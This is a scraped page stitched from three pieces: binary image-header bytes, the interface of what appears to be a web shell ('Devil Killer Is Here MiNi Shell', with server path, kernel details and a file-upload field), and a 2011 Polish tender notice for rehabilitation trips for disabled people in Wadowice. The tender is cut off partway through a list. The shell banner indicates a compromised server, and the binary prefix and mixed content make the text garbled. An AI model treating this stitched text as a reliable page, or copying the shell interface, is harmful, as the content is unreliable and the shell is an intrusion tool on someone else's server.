JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110506/104072-N-2011.html

<p class="kh_header"><b>Wadowice: Zorganizowanie siedmiodniowych wyjazdów rehabilitacyjno - integracyjnych dla osób niepełnosprawnych (beneficjentów ostatecznych) i członków ich rodzin oraz dla osób nieaktywnych zawodowo ze względu na opiekę nad dzieckiem niepełnosprawnym lub inną osobą zależną (beneficjentów ostatecznych) i członków ich rodzin realizowanych ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki Poddziałanie 7.1.2</b><br>
<b>Numer ogłoszenia: 104072 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Mickiewicza 15, 34-100 Wadowice, woj. małopolskie, tel. 33 870 90 10, faks 33 870 90 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-wadowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie siedmiodniowych wyjazdów rehabilitacyjno - integracyjnych dla osób niepełnosprawnych (beneficjentów ostatecznych) i członków ich rodzin oraz dla osób nieaktywnych zawodowo ze względu na opiekę nad dzieckiem niepełnosprawnym lub inną osobą zależną (beneficjentów ostatecznych) i członków ich rodzin realizowanych ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki Poddziałanie 7.1.2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie siedmiodniowych wyjazdów rehabilitacyjno - integracyjnych dla osób niepełnosprawnych oraz dla osób nieaktywnych zawodowo ze względu na opiekę nad dzieckiem niepełnosprawnym lub inną osobą zależną i członków ich rodzin. Zamówienie podzielono na zadania ze względu na różne grupy osób, dla których mają być zorganizowane wyjazdy.
ZADANIE NR 1 - Zorganizowanie siedmiodniowego wyjazdu rehabilitacyjno - integracyjnego do miejsca oddalonego od Wadowic od 50 km do 300 km dla 18 osób niepełnosprawnych (beneficjenci ostateczni BO) wraz z 15 opiekunami - w sumie 33 osoby.
Obowiązki Wykonawcy:
1.	Wykonawca musi zorganizować transport uczestników na miejsce pobytu oraz ich powrót. Wyjazd winien być zorganizowany z Andrychowa,Wadowic,Kalwarii Zebrzydowskiej w dniach między 11 a 31 sierpnia 2011 r. na 7 dni (łącznie z przejazdem w obie strony) do miejscowości oddalonej od Wadowic od 50 km do 300 km,  autokarem lub busem z klimatyzacją,
2.	Wykonawca musi zapewnić na czas przejazdu do i z ośrodka opiekuna grupy (osoba inna niż kierowca),
3.	Wykonawca musi pokryć koszty ubezpieczenia uczestników wyjazdu (zapewnić uczestnikom ubezpieczenie od następstw nieszczęśliwych na czas podróży i pobytu w ośrodku),
4.	Wykonawca musi opłacić opłatę klimatyczną za wszystkich uczestników, jeśli wymagać będzie tego lokalizacja ośrodka,
5.	Wykonawca musi zakwaterować uczestników wyjazdu w Ośrodku, który posiada aktualny wpis do rejestru ośrodków OD przyjmujących grupy turnusowe, w pokojach z pełnym węzłem sanitarnym w budynku dostosowanym do potrzeb osób niepełnosprawnych łącznie z łazienkami przy pokojach, w tym i dla osób poruszających się na wózkach. Ośrodek ten musi dysponować pokojami przynajmniej w ilości: 2 x 3-osobowy, 13 x 2-osobowy, 4 x 1-osobowy. Wszystkie pokoje muszą znajdować się w jednym budynku, w którym również winna znajdować się stołówka lub jadalnia.
6.	Wykonawca musi zapewnić możliwość pobytu dodatkowo dla 3 osób, które indywidualnie zapłacą za swój pobyt (osoby te są już ujęte w zapotrzebowaniu na pokoje),
7.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu rozpoczęcia wyjazdu dla każdego uczestnika wyjazdu i opiekuna,osoby dodatkowej w formie zamiennika na ognisko z produktami grillowanymi (np. kiełbasa, karkówka) a w przypadku złej pogody spotkanie całej grupy np. na świetlicy itp. w ustalonym wspólnie z opiekunem grupy terminie,
8.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu zakończenia wyjazdu dla każdego uczestnika wyjazdu w formie zapewnienia suchego prowiantu na czas podróży,
9.	Wykonawca musi zapewnić wyżywienie uczestnikom wyjazdu - 3 posiłki dziennie (śniadanie, obiad, kolacja),
10.	Wykonawca musi przedstawić propozycję harmonogramu zajęć uczestników Zamawiającemu.
11.	Wykonawca musi zapewnić salę na zaplanowane zajęcia z psychologiem dla uczestników wyjazdu podzielonych na trzy grupy tj.:
-osoby niepełnosprawne intelektualnie i ich opiekunowie (10 osób) - 3 dni po 3 godziny,
-pozostałe osoby niepełnosprawne i ich opiekunowie (13 osób) - 3 dni po 3 godziny,
-osoby niepełnosprawne chorujące psychicznie (10 osób) - 3 dni po 3 godziny,
12.	Wykonawca musi zapewnić w dniu przyjazdu, BO, konsultację lekarską w celu ustalenia planu zabiegów rehabilitacyjnych dla uczestników, 
13.	Wykonawca musi zorganizować zajęcia rehabilitacyjne dla uczestników wyjazdu -4 dni po 2 godziny,
14.	Wykonawca musi zorganizować w czasie całego pobytu jedną wycieczkę i sześć zajęć spośród poniżej wymienionych: integracyjne, kulturalno-oświatowe, sportowo-turystyczne,
15.	Wykonawca winien wyznaczyć osobę do kontaktu - kierownika grupy odpowiedzialnego za organizację zajęć, informowanie uczestników wyjazdu o planowanych zajęciach, czuwanie nad realizacją zajęć zgodnie z harmonogramem, 
16.	Wykonawca winien, w razie konieczności, zapewnić opiekę medyczną w tym zorganizować transport,
17.	Wykonawca musi przedstawić sprawozdanie z przebiegu wyjazdu.
Do momentu podpisania umowy liczba osób biorących udział w wyjeździe może ulec zmianie, ale będzie szczegółowo podana w umowie, jednak do celów oszacowania przez wykonawcę kosztów organizacji wyjazdu ustala się minimalną ilość osób - 26 oraz maksymalną ilość osób, - 33 która weźmie udział w wyjeździe.
Termin realizacji zamówienia: od dnia wyjazdu tj. w dniach między 11 a 31 sierpnia 2011r., czas trwania wyjazdu - 7 dni.
ZADANIE NR 2 - Zorganizowanie siedmiodniowego wyjazdu rehabilitacyjno - integracyjnego do miejsca oddalonego od Wadowic od 50 km do 300 km dla 24 osób nieaktywnych zawodowo ze względu na opiekę nad dzieckiem niepełnosprawnym lub inną osobą zależną (beneficjent ostateczny, BO) oraz 24 ich niepełnosprawnych podopiecznych osób z najbliższego otoczenia BO - w sumie 48 osób.
Obowiązki Wykonawcy
1.	Wykonawca musi zorganizować transport uczestników na miejsce pobytu oraz ich powrót. Wyjazd winien być zorganizowany z Andrychowa,Wadowic,Kalwarii Zebrzyd. w dniach między 1 a 21 sierpnia 2011r. na 7 dni (łącznie z przejazdem w obie strony) do miejscowości oddalonej od Wadowic od 50 km do 300 km,  autokarem lub busem z klimatyzacją,
2.	Wykonawca musi zapewnić na czas przejazdu do i z ośrodka opiekuna grupy (osoba inna niż kierowca),
3.	Wykonawca musi pokryć koszty ubezpieczenia uczestników wyjazdu (zapewnić uczestnikom ubezpieczenie od następstw nieszczęśliwych wypadków na czas podróży i pobytu w ośrodku),
4.	Wykonawca musi opłacić opłatę klimatyczną za wszystkich uczestników, jeśli wymagać będzie tego lokalizacja ośrodka,
5.	Wykonawca musi zakwaterować uczestników wyjazdu w Ośrodku, który posiada aktualny wpis do rejestru ośrodków OD przyjmujących grupy turnusowe, w pokojach z pełnym węzłem sanitarnym w budynku dostosowanym do potrzeb osób niepełnosprawnych łącznie z łazienkami przy pokojach, w tym i dla osób poruszających się na wózkach. Ośrodek ten musi dysponować pokojami przynajmniej w ilości: 4x3-osobowy, 19x2-osobowy i 1x4-osobowy (w przypadku braku pokoju 4-osobowego można zastąpić go: 2x2-osobowy lub 1x3-osobowy z dostawką). Wszystkie pokoje muszą znajdować się w jednym budynku, w którym również winna znajdować się stołówka lub jadalnia.
6.	Wykonawca musi zapewnić możliwość pobytu dodatkowo dla 6 osób, które indywidualnie zapłacą za swój pobyt (osoby te są już ujęte w zapotrzebowaniu na pokoje).
7.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu rozpoczęcia wyjazdu dla każdego uczestnika wyjazdu i opiekuna,osoby dodatkowej w formie zamiennika na ognisko z produktami grillowanymi (np. kiełbasa, karkówka) a w przypadku złej pogody spotkanie całej grupy np. na świetlicy itp. w ustalonym wspólnie z opiekunem grupy terminie,
8.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu zakończenia wyjazdu dla każdego uczestnika wyjazdu w formie zapewnienia suchego prowiantu na czas podróży,
9.	Wykonawca musi zapewnić wyżywienie uczestnikom wyjazdu - 3 posiłki dziennie (śniadanie, obiad, kolacja),
10.	Wykonawca musi przedstawić propozycję harmonogramu zajęć uczestników Zamawiającemu.
11.	Na czas udziału BO w zajęciach rehabilitacyjnych Wykonawca musi zapewnić opiekę (min. 4 wykwalifikowane osoby - np. rehabilitant, pielęgniarka, pedagog specjalny) dzieciom oraz innym osobom zależnym,
12.	Wykonawca musi zapewnić w dniu przyjazdu BO, konsultację lekarską w celu ustalenia planu zabiegów rehabilitacyjnych dla uczestników, 
13.	Wykonawca musi zorganizować zajęcia rehabilitacyjne dla uczestników wyjazdu -4 dni po 2 godziny,
14.	Wykonawca musi zorganizować zajęcia rehabilitacyjne dla 24 dzieci i innych osób zależnych niepełnosprawnych, uwzględniające ich niepełnosprawności - 3 dni po 2 godziny (osoby niepełnosprawne w wieku od 4 do 83 lat, schorzenia: przepuklina oponowo-rdzeniowa, zespół Downa, dziecięce porażenie mózgowe, epilepsja, ślepota, zespół wad wrodzonych, wada słuchu, karłowatość),
15.	Wykonawca musi zorganizować w czasie całego pobytu jedną wycieczkę i sześć zajęć spośród poniżej wymienionych: integracyjne, kulturalno-oświatowe, sportowo-turystyczne,
16.	Wykonawca winien wyznaczyć osobę do kontaktu - kierownika grupy odpowiedzialnego za organizację zajęć, informowanie uczestników wyjazdu o planowanych zajęciach, czuwanie nad realizacją zajęć zgodnie z harmonogramem, 
17.	Wykonawca winien, w razie konieczności, zapewnić opiekę medyczną w tym zorganizować transport,
18.	Wykonawca musi przedstawić sprawozdanie z przebiegu wyjazdu.
Do momentu podpisania umowy liczba osób biorących udział w wyjeździe może ulec zmianie, ale będzie szczegółowo podana w umowie, jednak do celów oszacowania przez wykonawcę kosztów organizacji wyjazdu ustala się minimalną ilość osób - 40 oraz maksymalną ilość osób - 48, która weźmie udział w wyjeździe.
Termin realizacji zamówienia: od dnia wyjazdu tj. w dniach między 1 a 21 sierpnia 2011r., czas trwania wyjazdu - 7 dni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Wykonawca zobowiązany jest wykazać, że posiada aktualny wpis do rejestru organizatorów turnusu OR. Ocena spełnienia tego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku wykonawca zobowiązany jest wykazać usługi, które wykonał w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy, wykonawca zobowiązany jest wykazać, że wykonał w tym okresie, co najmniej dwie usługi, które odpowiadają swoim rodzajem i wartością przedmiotowi niniejszego zamówienia. Ocena spełnienia tego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku wykonawca zobowiązany jest wykazać, że dysponuje kadrą rehabilitacyjną zdolną do wykonania zamówienia, posiadającą wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień. Ocena spełnienia tego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku wykonawca zobowiązany jest przedłożyć opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełnienia tego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Aktualne zawiadomienie o wpisie do rejestru ośrodków, Ośrodka w którym Wykonawca zorganizuje wyjazd, opis lokalizacji tego Ośrodka oraz wszystkie dane potwierdzające jego zgodność z wymaganiami postawionymi w SIWZ tj.:
- dostosowanie budynku do potrzeb osób niepełnosprawnych łącznie z łazienkami przy pokojach, w tym i dla osób poruszających się na wózkach,
- posiadanie wymaganego zaplecza rehabilitacyjnego, 
- potwierdzenia znajdowania się wszystkich pokoi w jednym budynku wraz ze stołówką lub jadalnią,
2. Wykaz co najmniej trzech różnych zabiegów rehabilitacyjnych, jakie może zaoferować wykonawca oraz harmonogram zajęć rehabilitacyjnych, integracyjnych, kulturalno-oświatowych i sportowo-turystycznych w ilości ogólnej zajęć zaplanowanych dla uczestników w trakcie całego pobytu zgodnie z opisem przedmiotu zamówienia  - pkt. 3 SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą w szczególności terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy. Istotne zmiany postanowień umowy mogą także wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-wadowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pcpr-wadowice.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2011 godzina 13:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Wadowicach, ul. Mickiewicza 15, Dziennik Podawczy p. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Poddziałanie 7.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie siedmiodniowego wyjazdu rehabilitacyjno - integracyjnego do miejsca oddalonego od Wadowic od 50 km do 300 km dla 18 osób niepełnosprawnych (beneficjenci ostateczni BO) wraz z 15 opiekunami - w sumie 33 osoby..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki Wykonawcy:
1.	Wykonawca musi zorganizować transport uczestników na miejsce pobytu oraz ich powrót. Wyjazd winien być zorganizowany z Andrychowa,Wadowic,Kalwarii Zebrzydowskiej w dniach między 11 a 31 sierpnia 2011 r. na 7 dni (łącznie z przejazdem w obie strony) do miejscowości oddalonej od Wadowic od 50 km do 300 km,  autokarem lub busem z klimatyzacją,
2.	Wykonawca musi zapewnić na czas przejazdu do i z ośrodka opiekuna grupy (osoba inna niż kierowca),
3.	Wykonawca musi pokryć koszty ubezpieczenia uczestników wyjazdu (zapewnić uczestnikom ubezpieczenie od następstw nieszczęśliwych na czas podróży i pobytu w ośrodku),
4.	Wykonawca musi opłacić opłatę klimatyczną za wszystkich uczestników, jeśli wymagać będzie tego lokalizacja ośrodka,
5.	Wykonawca musi zakwaterować uczestników wyjazdu w Ośrodku, który posiada aktualny wpis do rejestru ośrodków OD przyjmujących grupy turnusowe, w pokojach z pełnym węzłem sanitarnym w budynku dostosowanym do potrzeb osób niepełnosprawnych łącznie z łazienkami przy pokojach, w tym i dla osób poruszających się na wózkach. Ośrodek ten musi dysponować pokojami przynajmniej w ilości: 2 x 3-osobowy, 13 x 2-osobowy, 4 x 1-osobowy. Wszystkie pokoje muszą znajdować się w jednym budynku, w którym również winna znajdować się stołówka lub jadalnia.
6.	Wykonawca musi zapewnić możliwość pobytu dodatkowo dla 3 osób, które indywidualnie zapłacą za swój pobyt (osoby te są już ujęte w zapotrzebowaniu na pokoje),
